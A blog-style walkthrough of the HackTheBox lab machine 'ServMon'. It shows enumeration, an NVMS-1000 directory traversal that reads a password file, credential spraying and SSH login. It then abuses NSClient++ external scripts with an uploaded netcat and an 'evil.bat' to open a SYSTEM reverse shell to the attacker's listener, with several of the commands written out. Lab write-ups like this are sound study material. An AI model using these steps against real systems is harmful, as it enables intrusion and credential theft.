Today we are going to talk about the ServMon machine, created by @dmw0ng and available on the HackTheBox platform.
Available since April 11 to replace Traverxec, it is a Windows machine of easy difficulty.

Enumeration


My first enumeration phase will begin, with a port scan performed using the nmap tool.

nmap -sC -sV -p- 10.10.10.184

Among the open ports on this machine, several will be worthy of interest:

*** TCP / 21: FTP service

open ftp server

Accessible publicly and without authentication, the latter exhibits two files:

  • Confidential.txt : a message written by Nadine and addressed to Nathan, specifying that a file called "Passwords.txt" has been placed on his desktop;
Content of the file Confidential.txt
We will also note in passing the two discovered users ( Nathan and Nadine ) through the tree structure of the FTP server!

Notes to do.txt : a memo written by Nathan to list his work in progress…

We may note that access to the NSClient application has been protected and that the withdrawal of public access to the NVMS solution has not been achieved ... The latter must therefore be logically listed during our enumeration!
Contents of the file Notes to do.txt

*** TCP / 22: SSH service

An OpenSSH server… Always useful for remote administration of machines! Furthermore, since the TCP / 5985 and TCP / 5986 ports are not open, a remote connection via the WinRM protocol cannot be made; leaving us for only options as the SSH server or possible access through the SMB protocol (TCP / 445) in the event that a share is writable by our users.

*** TCP / 80: HTTP service

Port 80 nmap output
NVMS-1000 login page

The TCP / 80 port will present an authentication interface to the “ NVMS-1000 ” solution: a first interesting point that will confirm Nathan's memo recorded on the FTP server!

After a quick search for the exploits available, we can see that a "Directory Traversal" type flaw exists on this software… This point should therefore be checked at the end of our enumeration phase!

NVMS 1000 - Directory Traversal
NVMS 1000 - Directory Traversal.. webapps exploit for Hardware platform

*** TCP / 8443: HTTPS service

NSClient++ administration interface

To conclude this enumeration phase, we will find an authentication page present at the address https://10.10.10.184:8443. The latter corresponds to the NSClient ++ solution : an agent used for remote supervision of equipment through Centreon (formerly Nagios )… The name of this machine therefore takes on its full meaning!

Regarding the NSClient ++, I invite you to study the reference documentation that may prove useful for understanding the following events. https://docs.nsclient.org/

With enough information for the moment, we can now start our initial access phase!

Initial access

During our previous phase, I noted that a vulnerability was identified on the NVMS-1000 solution. Also, my first step was to check this point on the machine based on the exploit available; through a GET request , reading the "win.ini" file. The result obtained will confirm the vulnerability of this machine:

Using burp to retrieve the contents of Windows file win.ini

Now that we know the flaw of this system, it only remains for us to take into account the information obtained previously namely:

  • Nadine dropped a file on Nathan's desktop (so  C:\Users\Nathan\Desktop on a Windows operating system!);
  • The file is named Passwords.txt.

So, we will have to go back to the root of the system then make a GET request on users/nathan/desktop/passwords.txt in order to list the passwords present in the target file.

Contents of Passwords.txt


Having a list of passwords, I can now test them to identify the account ( Nadine and / or Nathan ) and the associated password!

For my part I used the excellent CrackMapExec from Marcello to meet this need.
byt3bl33d3r/CrackMapExec
A swiss army knife for pentesting networks. Contribute to byt3bl33d3r/CrackMapExec development by creating an account on GitHub.
Attempts to connect to Nathan and Nadine using recovered passwords

Well, we now have Nadine IDs on the system!

My first attempt was first to list the shares accessible by the user; all write access through SMB (TCP / 445) de facto providing us with a shell on the system.

For example, the psexec.py tool from the famous Impacket suite can perform this type of operation.

Unfortunately, we will see that Nadine does not have the rights required for this action:

List of shares accessible by the user Nadine

Therefore, we only have to test the use of these identifiers from an SSH connection and ... Bingo!

ssh [email protected]
Logged in as Nadine!

We can now retrieve the user flag for this machine!

User.txt flag

Privilege escalation


Access to the web interface of the NSClient++ software

Given the information revealed during the initial enumeration phase, I directly directed my research on the NSClient ++ software.

As mentioned from the authentication window, it is possible to reset and / or display the connection password from the nscp tool:

Click on the Forgotten password? Link will provide us with this information

Thus, this same command was launched locally in order to recover the password ...

NSClient ++ web interface password


Allowing you to log into the web interface ... which at first glance is a failure!

The connection does not seem to be authorized ... Note in passing a beautiful spelling mistake!

The error noted, remember, seems to confirm Nathan's memo stating that access to the NSClient had been protected ... Indeed, studying the configuration file nsclient.ini will specify that access to the web interface is only allowed from the local server interface (127.0.0.1):

Contents of nsclient.ini

This is why, in order to access the web interface, I chose to Forward TCP / 8443 port (from the local server interface!) On my machine from our SSH tunnel.

For those wishing to deepen the concept of "TCP Forwarding", I invite you to consult the reference documentation!
SSH port forwarding - Example, command, server config
SSH port forwarding/tunneling use cases and concrete examples. Client command, server configuration. Firewall considerations.
ssh -L 8443: 127.0.0.1: 8443 [email protected]
Access to the web interface from the address https://127.0.0.1:8443

Access to the system as NT AUTHORITY/ SYSTEM

Like the elevation carried out on the software "NVMS-1000" , I noted that a vulnerability existed on version 0.5.2.35 of NSClient++

NSClient++ 0.5.2.35 - Privilege Escalation
NSClient++ 0.5.2.35 - Privilege Escalation.. local exploit for Windows platform
nscp test
Use of NSClient++ in version 0.5.2.35

As presented on the previous link, an external script called from the interface will be launched with the rights of the service running the NSClient++ web server; namely Local System !

The rights of the service cannot however be controlled locally from the Nadine user… But hey, let's trust our feat!

Wishing to obtain a reverse shell (with the highest rights!) I will therefore need:

  • Place the netcat utility on an accessible folder ( C: \ Temp );
  • Listening my TCP / 443 port;

[email protected] #scp [email protected]: /Path/to/nc64.exe nc64.exe
[email protected] #nc -nlvp 443

Configure an external script which will launch the command "C:\Temp\evil.bat" ;

adding shell command and executing sec.bat

Create this famous script (it will work better!) Then drop it in our accessible folder ( C:\Temp);

Contents of evil.bat

[email protected] #scp [email protected]_attacker: /Path/to/evil.bat evil.bat

  • Restart the NSClient service from the Control button on the interface;
  • Run the previous script from the Queries tab of the web interface ...

And that's the job! 👌

Welcome root!

We just have to recover the root flag to complete this challenge 🎉

Conclusion

This is where my presentation of the "ServMon" machine ends. Compliant with the level of difficulty announced, ServMon is fairly simple and legible in its resolution phases; making this machine fairly consistent as a whole.

I regret however the (too) great ease of resolution of this challenge as well as the absence of elevation scenario including the second user "Nathan". Some untimely slowness and "reset" on the part of the attackers will also have been right for my patience 😫

To conclude, I would like to warmly thank @dmw0ng for its contribution which naturally remains very appreciable and entertaining during this period of confinement!

To conclude, I would like to warmly thank @dmw0ng for its contribution which naturally remains very appreciable and entertaining during this period of confinement!

Until next time!

Your friendly neighborhood Hacker

You've successfully subscribed to Flaviu Popescu
Welcome back! You've successfully signed in.
Great! You've successfully signed up.
Success! Your account is fully activated, you now have access to all content.